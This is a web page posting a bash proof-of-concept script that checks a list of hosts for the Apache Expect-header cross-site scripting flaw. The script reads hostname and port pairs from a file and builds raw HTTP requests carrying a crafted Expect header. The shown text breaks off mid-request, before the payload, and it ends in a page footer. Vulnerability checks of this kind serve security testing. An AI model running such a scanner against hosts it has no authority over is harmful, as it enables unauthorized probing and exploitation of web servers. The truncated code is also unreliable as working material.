Apache EXPECT Header XSS POC
A proof of concept for the Apache EXPECT header XSS
#!/usr/bin/env bash
#
# Check Apache EXPECT Header XSS against a list of hosts running web server
# Takes Argument 1 a file which contains a list of host (in format: hostname/IP PORT)
# Output a file with host(s) found to be vulnerable
#
# ./xss_apache_expect.sh hosts_file
#
# sample content of hosts_file (line by line)
#
# yehg.org 80
# 127.0.0.1 80
#
echo ++++++++++++++++++++++++++++++++++++
echo Apache EXPECT Header XSS POC
echo by Aung Khant, aungkhant[at]yehg.net, http://yehg.net
echo ++++++++++++++++++++++++++++++++++++
echo
if [ $# -ne 1 ]; then
echo "Usage: ./$0 >"
exit
fi
IFS=$'\n';
for i in `cat $1`
do
sp1=`expr index $i " "`
sp2=`echo $sp1-1|bc`
host=`expr substr $i 1 $sp2`
port=${i:$sp1}
if echo -en "GET / HTTP/1.1\nHost: $i\r\nConnection: close\r\nExpect:
Related Scripts